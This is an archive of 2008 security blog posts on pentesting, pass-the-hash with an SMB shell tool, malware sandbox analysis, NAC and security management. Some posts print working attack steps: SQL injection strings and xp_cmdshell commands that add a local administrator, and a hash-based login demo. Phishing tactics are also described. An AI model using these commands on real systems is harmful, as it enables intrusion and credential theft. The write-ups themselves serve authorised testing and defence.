Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do :
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin


cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to
[*] Authenticating to

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit


oh and shell, shell is fun

[*] Opening share ADMIN$...
[*] Connected to ADMIN$ ( ->
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot


Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :


[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to
[*] Authenticating to

If you have no idea what nasl is

Thanks to MC for bringing this up to me.

Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.

Saturday, November 8, 2008

Intrusion Debt and Security ROI and Security Malpractice

Richard Bejtlich has a new post linked to an older post and mentions the idea of intrusion debt as the counter argument to security ROI. I agree with RB that there is no ROI on security (he has lots of posts arguing this and they are good reads), doing things safely is your ROI, operating your network without compromise and data loss (or minimizing it) is your ROI, protecting your IP is your ROI. From the slides on the new post is the question of what if we allowed people who build bridges to operate at the same standards as those who build networks. Scary, right?

"Imagine that you defer that cost by not detecting and responding to the intrusion. Perhaps the intruder is stealthy. Perhaps you detect the attack but cannot respond for a variety of reasons. The longer the intrusion remains active, I would argue, the more debt one builds."

"How many CEOs/CIOs/CTOs/CISOs/CSOs will look at the digital wreckage of an incident and wonder "why didn't we see this happening?"

The key to that is catching it in the first place and being able to adequately respond or have policies in place once you do see it. In 2008, I didn't think we would still be there, but we are and its sad.

I think business and government entities are lucky about how much they are allowed to shield (lie) to its customers and employees about network compromises. If a network has been owned for several months and the appropriate action wasn't taken (so at some point the compromise was discovered) should that be grounds for fines or lawsuits? You know that any domain will have some type of PII, intellectual property, or something worth protecting floating around. What are people to do with network/security malpractice? Is it feasible to hold those CxO people accountable at that level? What are common people supposed to do when there is gross negligence with their information? Current laws, regulation, and fines obviously aren't working or a sufficient deterrent and I'm not sure asking a technology immature legislative system to come up with more unenforceable laws is a good solution either.

Thoughts on what to do?

Tuesday, November 4, 2008

EFF NSA shirt...I gots mine!


Saturday, November 1, 2008

Implementing NAP and NAC Security Technologies Book Review

Implementing NAP and NAC Security Technologies: The Complete Guide to Network Access Control

Dan Hoffman

4 stars

Witty Title for Amazon: Clear and Actionable Advice on Choosing the Right NAC Solution

I was asked to read a pre-release copy of the book, my quote made it onto the book, and I was given a review copy.

I found myself in a position to learn about the different types of NAC appliances as well as Mobile NAC. The problem is that I don't work for a NAC vendor or install NACs for a living. Googling left me with tons of vendor hype on NAC but not a lot of good information to help me understand the different type of NACs, how they work, and why I would would choose one type over the other. Dan Hoffman's book is the only NAC book I know of that is (mostly) vendor neutral. The only other NAC/NAP books I know of are Cisco Press book which obviously tout Cisco products as the best way to go. Dan Hoffman breaks down the functionality of NAC and they different types of NAC solutions into simple easy to understand language, just like he did for Blackjacking on mobile threats. He has a great knack for explaining technical systems and topics in an easy to understand way.

Here is a list of what he covers in the book:

CH1 Understanding Terms and Technologies
CH2 The Technical Components of NAC Solutions
CH3 What Are You Trying to Protect?
CH4 Understanding the Need for LAN-Based NAC/NAP
CH5 Understanding the Need for Mobile NAC
CH6 Understanding Cisco Clean Access
CH7 Understanding Cisco Network Admission Control Framework
CH8 Understanding Fiberlink Mobile NAC
CH9 Understanding Microsoft NAP Solutions
CH10 Understanding NAC and NAP in Other Products

My favorite chapters are CH3 "What Are You Trying to Protect?", CH4 "Understanding the Need for LAN-Based NAC/NAP", and CH5 "Understanding the Need for Mobile NAC."

By far the most important chapter is chapter three where Dan walks through the questions an organization needs to ask itself before it purchases a NAC solution. The company needs to know if they are trying to protect LAN based or Mobile assets and they need to know exactly what they are trying to protect the answer from the first question against. Dan discusses the various scenarios that come about from those two questions and the two follow on chapters provide even more detail on how the two types of solutions (LAN based and Mobile NAC) work and how they differ from one another. Chapter two covers the details of the different parts of NAC and Chapters 6-10 give some of the specifics about different NAC vendor's solutions (not a complete list).

The only thing I didn't like about the book was that it really didn't cover bypassing NAC. It would have been nice to see some content on how NAC is currently being bypassed or what NAC doesn't protect against and how to mitigate against it.


Tuesday, October 28, 2008

Maltego Malware Domain List Transforms

Not much hype about the release but the Paterva crew has introduced some really useful transforms for Maltego that utilize Malware Domains List's database.

"We've created a transform application server for integration with the DB. If you want to see how it works you can download the Community Edition of Maltego (if you don't have it already) from

Once you have it running you should go to Tools -> Manage transforms and click on Discover Transforms.
You can now add a new discovery server with name "MALTAS" and URL"


Pretty handy when all you have is a possible bad IP and want to see if they are already on the "bad boy" list. Being able to see the URL serving up the malware is handy too so you can grab it for analysis.

Thoughts on why we need exploit code and hacker tools

Dean made a comment in the SILC channel about a student who:

"student thinks its terrible to release tools, exploits, etc...he says it makes it too easy for people to attack America"

Its not the first time I've heard that argument, but after a few weeks in the new gig I have newfound understanding for the need to provide "absolute proof" of exploitation or the ability to exploit something.

So while on one hand I understand that exploit code and tools allows bad guys to do what they do on the other hand you have people that require you as their security person to show them with absolute certainty something happened or something could happen. Otherwise there is no "proof." And if I need to show proof to get a problem fixed, mitigated or policy changed or put in place its nice to have the ability to do that.


Saturday, October 25, 2008

Multiple Thoughts on Multiple Security Issues

I'm too tired to put enough effort into several blog posts even though I really want to but next week is already looking painful so I'm going tho throw several different thoughts into this post.

First Thought: The CISSP CBK aint so bad...

After spending the last week explaining what I consider core security ideals to people that should know better, I found myself really feeling that a senior security person should understand those core ideals as a minimum level of competency. To be a keyboard guy, my opinion stands that CISSP not a measure of their ability, but I would expect a "hands-on" guy to know that material as well.

The latest TaoSecurity post mentions NIST 800-27 Engineering Principles for Information Technology Security (A Baseline for Achieving Security) maybe I'll start recommending that.

Second Thought: What should a CxO know?

I'm new to the whole CxO thing, but shouldn't your CIO/CTO/CISO jobs understand the things from the first thought? I am thinking yes, they should have more than a PMP to make smart security decisions but I'd like some feedback on that. Like I said I'm new to that kind of environment. Alot of the people on the SBN that hold those positions seem to understand those concepts.

Third Thought: How do you fix a "porous" network?

By porous I mean more than one security hole at any one time and usually a LARGE security hole. Back to the first thought people seem to think if you can fix one problem the rest magically put themselves on hold while you fix that one and you can "catch up"...not! I am also new to real Incident Handling and Response (in the past I've been the guy getting to cause all the trouble) but I'm finding more and more holes and issues as we try to mitigate and fix the first issue. How do you make people understand that the problems dont stop coming in if you have poor network security or poor network design.

Fourth Thought: Initial feeling on SIMs

My initial take on Security Information Management devices are that they are great concepts. I'm starting to play with Cisco MARS and thus far I am impressed on what it SHOULD be able to do. I'll let you know later how well it does.

Fifth Thought: Another unauthenticated full remote MS exploit...SCORE!

I love bugs that are on the level of MS03-026, MS04-011, and MS06-040. Mass pwnage on pentests is awesome. I hope this new MS08-067 ends up being that bad (and the msf module comes out at some point). We need a new DCOM or LSASS exploit. I love it when we get proof that network security isnt dead.

Last Thought: Really more of a "what would you do/recommend"

In our fictional example you found pwdump on your Domain Controller (not put there by one of your admins) and the registry keys point heavily that its been run successfully and results have downloaded. What do you or recommend to the customer?

The book/draconian answer is wipe everything and start over. In people's experience is that a real option for a real network without the ability for mass downtime? Is a mass password reset considered enough of a mitigation?

Would appreciate input from the people out there on our fictional scenario.

Wednesday, October 22, 2008

Malware targeting industrial control software(?)

So this morning I was doing my usual malware roundup and looking for anything new or vaguely interesting. Lots of the usual sites all serving the same thing. The pdf exploit (I've a special fondness for this one, see the pentesting failures post), the snapshot_viewer_activex exploit, ms08_053, realplayer11, ms08_011, ms06_014 and a few others. All pretty popular right now.

Then I saw a site that has been floating around serving up malware for a while now. It's been up for about a year I think. It's always had a nice index.htm page with a list of iframes serving up all of the above and some others. I generally have a quick look every now and again and find it's always the same stuff. Lots of reuse of exploits, etc...

Today was a surprise as I found something 'new'. The page has another exploit added. Nothing new about that but it's what the exploit is for that is surprising.


In August a stack overflow exploit in the Iconics Vessel ActiveX control was released. The exploit is in the dlgwrapper.dll [Dialog Wrapper Module ActiveX control]. Tebo and kf wrote a Metasploit exploit module for it. [].

Iconics makes plant automation software for various industries including oil, gas, pharma, airports, etc... SCADA anyone?

A quick decode of the ucs2 encoded payload reveals:


The exploit downloads taskmgr.exe, a dropper that installs a second stage piece of malware. I've not downloaded that as yet so I don't know the actual payload or it's function.

I guess what is interesting to me is that the malware authors have decided to use an exploit that has a somewhat small target audience. I could be wrong as I'm not that familiar with those industries and perhaps the software is really widespread.

dean de beer

Sunday, October 19, 2008

ChicagoCon Fall 2008

As usual Don has a great lineup for ChicagoCon 2008f.

ChicagoCon, a bi-annual security event held in the Windy City, features an Ethical Hacking Conference for two days of cutting-edge talks, peer networking and career advancement in the exciting and growing field of computer security for only $100. Microsoft penetration testers AKA ethical hackers, Billy Rios and John Walton headline an impressive list of presentations by researchers, practitioners and executives on Oct 31 and Nov 1, 2008.

ChicagoCon 2008f: White Hats Come Together in Defense of the Digital Frontier

October 27 – November 2, 2008

The (f)all edition of this bi-annual security event features 12 boot camps (M-F), exams on-site followed by a 2-Day Ethical Hacking Conference (Fri – Sat) featuring Microsoft Hackers AKA Blue Hats Billy Rios and John Walton along with many other speakers and activities.

Con Only Tickets available for just $100.

Courses: CISSP, CISA, CEH, CHFI, ECSA, CWNA, Advanced Technical Hacking (Pen Testing, Web Apps and Reverse Engineering), Cisco CCENT/CCNA, Microsoft ISA Server and a combined CompTIA Network+/Security+ class. Novice, ultimate techie, CISO chair... everyone interested in a security career will find something at ChicagoCon.

Keynotes: Ed Skoudis (SANS, Intelguardians), Gregory Conti (West Point, Author "Security Data Visualization") and Daniel V. Hoffman (CTO SMobile Systems, EH-Net Columnist). Presented by

A list of the speakers is available here:

From Virus Alert to Pwnage Part 2

Some analysis on 2.exe.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)

[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK
* Filetype: PE_I386

[ General information ]
* Decompressing UPX3.
* File length: 2560 bytes.
* MD5 hash: c6e1de2f6ecae93c09c6bae78d8edcbf.

[ Changes to registry ]
* Creates key "HKCU\Software\Microsoft\Sound".

AhnLab-V3 2008.10.15.0 2008.10.14 -
AntiVir 2008.10.14 -
Authentium 2008.10.14 -
Avast 4.8.1248.0 2008.10.15 -
AVG 2008.10.15 -
BitDefender 7.2 2008.10.15 Trojan.Zlob.1.Gen
CAT-QuickHeal 9.50 2008.10.14 -
ClamAV 0.93.1 2008.10.15 -
DrWeb 2008.10.15 -
eSafe 2008.10.12 Suspicious File
eTrust-Vet 31.6.6148 2008.10.14 -
Ewido 4.0 2008.10.14 -
F-Prot 2008.10.14 -
F-Secure 8.0.14332.0 2008.10.15
Fortinet 2008.10.14 -
GData 19 2008.10.15 Trojan.Zlob.1.Gen
Ikarus T3. 2008.10.15 -
K7AntiVirus 7.10.493 2008.10.14 -
Kaspersky 2008.10.15
McAfee 5405 2008.10.14 -
Microsoft 1.4005 2008.10.15 -
NOD32 3522 2008.10.14 -
Norman 5.80.02 2008.10.14 -
Panda 2008.10.14 Suspicious file
PCTools 2008.10.14 -
Prevx1 V2 2008.10.15 Malicious Software
Rising 2008.10.14 -
SecureWeb-Gateway 6.7.6 2008.10.15 -
Sophos 4.34.0 2008.10.15 Sus/Behav-1005
Sunbelt 3.1.1722.1 2008.10.14 -
Symantec 10 2008.10.15 Downloader
TheHacker 2008.10.15 -
TrendMicro 8.700.0.1004 2008.10.14 PAK_Generic.001
VBA32 2008.10.14 -
ViRobot 2008.10.14.1419 2008.10.14 -
VirusBuster 2008.10.14 -
Additional information
File size: 2560 bytes
MD5...: c6e1de2f6ecae93c09c6bae78d8edcbf
SHA1..: 1b1d7916206583a57e54fe82ebe05a8fb55b25d5
SHA256: 68350cc81af2e867eecea64f1cc83e34ff8c19ad22b8c077529380cdadeaa658
SHA512: 512fd40e91bd47c1e6f1a0e202457cc5fe31ed90a2555f9af8a54796663b3c7a
PEiD..: -
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4041c0
timedatestamp.....: 0x48eeb35b (Fri Oct 10 01:43:55 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x3000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x4000 0x1000 0x400 6.22 ad30fe5c04339024e6b3344e72484898
UPX2 0x5000 0x1000 0x200 2.06 ebb1b5a9cd4ce06c69ef5ac4d3d7b72b

( 2 imports )
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc,
VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey

( 0 exports )
Prevx info:
packers (Kaspersky): PE_Patch.UPX, UPX
packers (F-Prot): UPX

Filename c:\2.exe
Filesize 2560 bytes
MD5 c6e1de2f6ecae93c09c6bae78d8edcbf
Loaded DLLs
Process Management Creates Process - Filename () CommandLine:
(C:\Program Files\Internet Explorer\iexplore.exe As User: () Creation Flags: ()


Found a norton report based on the IP

Severity: High

3 instances found. Here is a sample:


**show tcpstream from running the 2.exe in a VM

GET /stuff/border9.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Server: nginx/0.5.20
Date: Wed, 15 Oct 2008 20:27:23 GMT
Content-Type: text/html
Content-Length: 529
Connection: close

head title 404 Not Found /title /head
body bgcolor="white"
center h1 404 Not Found /h1 /center
hr center nginx/0.5.20 /center
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --

**I removed the brackets because blogspot kept rendering the html :-(

Saturday, October 18, 2008

Webapp Asssessments Rule or 'why running as 'dbo' is bad!

I just finished up a web application assessment for a client as part of an audit. All I can say is that I've not had that much fun on a web app pentest in ages!

All I was provided with was an ip address. Total blackbox testing. This usually sucks because if you can't get by the login screen, telling the client that, well, the design sucks does not go down well. I like to bring at least a little value.

I had a quick look at the login page and bamn! Full admin access. Yep, 'or 1=1-- lives on. No encoding or filters to bypass at all. As usual the first user in the database was Admin too. After adding another admin user and browsing through the site it was time to see what the database contained. Turns out all the error pages were generic pages as detailed error messages had been disabled. Blind SQLi on .aspx pages sucks. I though this was going to go from quick pwnage to a long ordeal to get the data. Enter Pragmatk. Prag is a friend of mine that just rocks at webapp stuff. We sat down and after visting all the pages and forms that accepted user input we actually found one that returned database error messages. W00t! Let the games begin!

In short order we had everything from the database. Users, passwords, clients, contracts and more. I was able to use the email addresses and passwords we found to log into the user's email account via Outlook Web Access. Perfect. Being greedy we wanted to get access to the server itself. We could create temporary tables and write data to them from any file on the server but this was not enough though. Local admin or fail! Turns out that RDP over 3389 was enabled! Don't ask because I have no idea why. So after trying some of the users and passwords and not getting anywhere I decided to see who the database was running as.

'; if user ='dbo' waitfor delay '0:0:5 '--

Hell yes! Running as Admin. I should have expected it after what we had already found. So next step was to see what I could leverage with this knowledge. In SQL2005 xp_cmdshell is disabled by default but if you have admin access it's really trivial to reenable this stored proceedure. [insert evil grin here]. Using sp_configure it took a few SQL queries to enable xp_cmdshell. A quick test to see if it succeeded.

exec master..xp_cmdshell 'ipconfig > test.txt';CREATE TABLE zeroday (txt varchar(8000)); BULK INSERT zeroday FROM 'C:\\windows\\system32\\test.txt'--

A quick read of the table and w00t!, our ipconfig data was there. Sweet. At this point I'd had too much coffee and started to overthink the next steps. I started going all old skool and writing to a ftp.txt file to pull down my backdoor.exe and execute it. Well at least I did not decide to go the debug.exe route. :) Halfway through I'm talking to Eric over the phone when he 'politely' reminds me that I have RDP access. Just add a user to local admin group and you're golden.

exec master..xp_cmdshell 'NET USER zeroday xxxxxxxx /add'--
exec master..xp_cmdshell 'NET LOCALGROUP "Administrators""zeroday"/add'--

Let's try RDP. It's such a good feeling to see that server's desktop appear! At this point I grabbed the password hashes from the server (not that I'm going to bother cracking them), uploaded my scanner, scanned the two subnets I had access to, got some screenshots! DO NOT! I repeat DO NOT run your exchange server on the same server as your webserver!

To finish up Pragmatk took a few minutes to find a persistant XSS in the site (there's more than one). He modified the username field to contain the XSS. If we really wanted we could have modifed each users profile to contain the XSS instead of only our test user. An invisible iframe and I'd have my backdoor dropped to their system in a heartbeat.

All in all a lot of fun was had all round. Cheers to Eric and Pragmatk who rocked as always.

dean de beer

A Successful Pentest with some Failures.

I'm busy preparing for a [de]briefing following a pentest that Eric and I completed a few weeks ago and was thinking about some of the challenges we faced on this particular engagement. Overall the engagement was VERY successful. We owned the client's infrastructure pretty much completely. This post is not so much about where we succeeded as it's about where we failed or could have improved our processes.

The one element that made this engagement different from most was the limited [really limited!] amount of time we had to complete all aspects of the engagement. 50 hours! This might seem a reasonable amount of time but when you consider that this included the remote, local [internal], phishing and reporting, it's a truly limited amount of time.

After finally getting all the contracts and authorization AKA 'Cover Your Ass' agreements signed we were finally able to proceed with the actual work. The scope itself placed some severe limitations on us but at the same time was very broad in what areas we could target. A contradiction I know. The scope, aside from limiting the amount of active time we had to do the work, as limited us to specific days for when we could actually perform any testing. The remote portion started on a friday night and the internal portion could begin on the Saturday and had a hard stop for both of 8pm on Sunday night.

This while not ideal did provide us with time to do the work. The remote portion of the engagement went pretty fast. The client had a reasonably small internet footprint and numerous sites and devices were out of scope. The internal portion though started off badly with the scope changing drastically. I HATE scope creep!

It turns out that the client was undergoing a large infrastructure and server migration. The address ranges we were provided were now invalid. No problem right? Just get the two new /24 ranges. But noooo, the client had changed the entire subnetting scheme and now we had servers accross about 6 or so subnets. Our scanning and fingerprinting time just increased one hullava a lot. Trying to explain to the client that this was now out of scope was like getting blood from a stone. Rather than posponing the pentest for an indefinite amount of time while waiting for another window to perform the work we decided to focus on only specific subnets and locations, again limiting the scope. Even so one of the things that became obvious was that rather than having the time to scan, enumerate and fingerprint the network and get a solid picture of how it operates and devices interact, I would have to be looking at potential ingress points while the scanning was going on. Not ideal but doable.

One thing I realized is that I'm going to need to keep more than one cheat sheet of scanning arguments for this type of situation in the future. By limiting your scan time you limit what can scan for and rather than taking scan results and reviewing them and then targeting and focusing on a single host, you need to decide on which hosts have the potential for greatest success and leave the others aside. This means you will miss things that may impact the success of the engagement.

Anyway, after enumerating workstations and servers via SMB and DCERPC scans I had an initial list of targets I wanted to focus on. While all this was going on I was also looking for a lot of the usual misconfigurations on the network such as unauthorized shares, default smtp community strings, insecure printers, workstations running the server service, etc... I found them all btw. ;)
So after bypassing the proxy, exfiltrating some data, and getting access to the SAN I needed to focus on the servers and workstations. What I realised was that I needed to better script some of the things I normally do. Running nessus from the command line is great. It's easy to script and cycle through some specific addys. I also realized I needed a few more specific custom scans that looked for a few specific vulnerabilities that I might leverage.

I did end up getting direct access on about 3 or 4 servers through various means. Being very focused as to what I was looking for and basing those searches on my initial analysis of their enviroment paid off. Luckily. It could have gone the other way and that would have, well, sucked. I managed to leverage some of those servers to get a little deeper into the network as well. The limitation on time meant that I could not use those boxes to pivot much deeper into the network. I simply checked for dual homed servers and scanned those subnets. The report covered the potential for further exploitation and access. Thankfully I'd already written scripts that when run would upload my scan utility, run it based on the ipconfig data and download the results to my host.

Another issue was that because this took place over the weekend the office was dead quiet. This meant no port level security, etc... This always makes man in the middle attacks pretty trivial and a great way to spoof dns, steal tokens, passwords, intercept RDP sessions, etc... Well with no traffic that sucked. The VoIP network segment was a little easier as we could create the voice traffic ourselves. That's always fun when you can intercept and replay the voice traffic.

The big issue with the internal portion, aside from managing changes in the scope, was that with limited time you really needed to know what your ultimate target was and to be able to make a decision on the path to take to achieve that goal. Do you target the servers directly? Do you go in via a workstation or do you attack the channels between these devices?

Obviously there are other routes to take but the point is that you need to be sure your direction is the right one or be able to change vectors quickly once you realise that the vector you're using is not working.

The phising portion of the engagement, while incredibly successful, also highlighted the issue of limited time while trying to gain as much information as possible. I've developed a series of scripts that I use in my phishing attacks to harvest, format and send emails, serve up webpages with code to drop a file, steal credentials and gather user information [both automatically and by enticing the user to enter credentials]. These scripts have served me well even though they need to be customized for the current client.

We made the decision that we would not have time to leverage any access we gained from the phish and so we wanted to gather as much data as possible from the target host before moving on to the next one. I have a series of scripts that will gather local data such as users, groups, domain, routes, browser history, etc, etc... I also have a script that takes screenshots of the remote host and downloads them to my system. [I love this script!] All the scripts work very well and save me a lot of time but one of the things I realized was that a phish can be too successful. :)

We had so many shells come through, that even with splitting them between Eric and myself we still missed some and were not able to gather all the data from everyone the way we wanted. I'm putting together a script that will call most of the other scripts when it runs so that I can run it once, gather the data and move on. Our current process is far more efficient than manually gathering that data but it still takes more time that I like in situations like this.

The ability to revise the payload mid phish was also something we had to do and, while we manged, it could have been done far more effeciently. I should have prepared the alternate payloads beforehand to account for this eventuality. Changing the payload on the webserver was as simple as replacing the existing on and modifying the headers in the page. The email was a little more difficult though. I needed to stop the existing smtp script, modify the paylaod and restart it with only the remaining emials being targeted. I then needed to regenerate a new phish email, containing the new payload and a new message, to entice the users that were already targeted. All this while trying to handle the existing shells. While it only takes one user to click on the link or attachment to be successful, this phish was about gathering as much data from as many users as possible.

I don't think our phish would have been half as successful if it had not been for mc and his ninja-like skills in modifying a pdf exploit to run as a Metasploit module, allowing us to use all the payloads in the framework. Awesome stuff.

Our ability to handle multiple payloads connecting back to our servers could also be improved. I actually lost about 5 shells because I could not establish a new session fast enough. Also, rather than having to run a script manually on the target it would be more effecient to have the payload execute a series of commands when it is executed without requiring any interaction at all.
When all was said and done the pentest was actually very successful and we achived all our goals, even with the hiccups we had along the way. It's always a good feeling when an engagement goes well, especially in an environment like this one.

It's important to review the processes and methods you use during an engagement regularily to see if they can be improved or made more effecient. Small things can make a huge difference to the success of a project.

dean de beer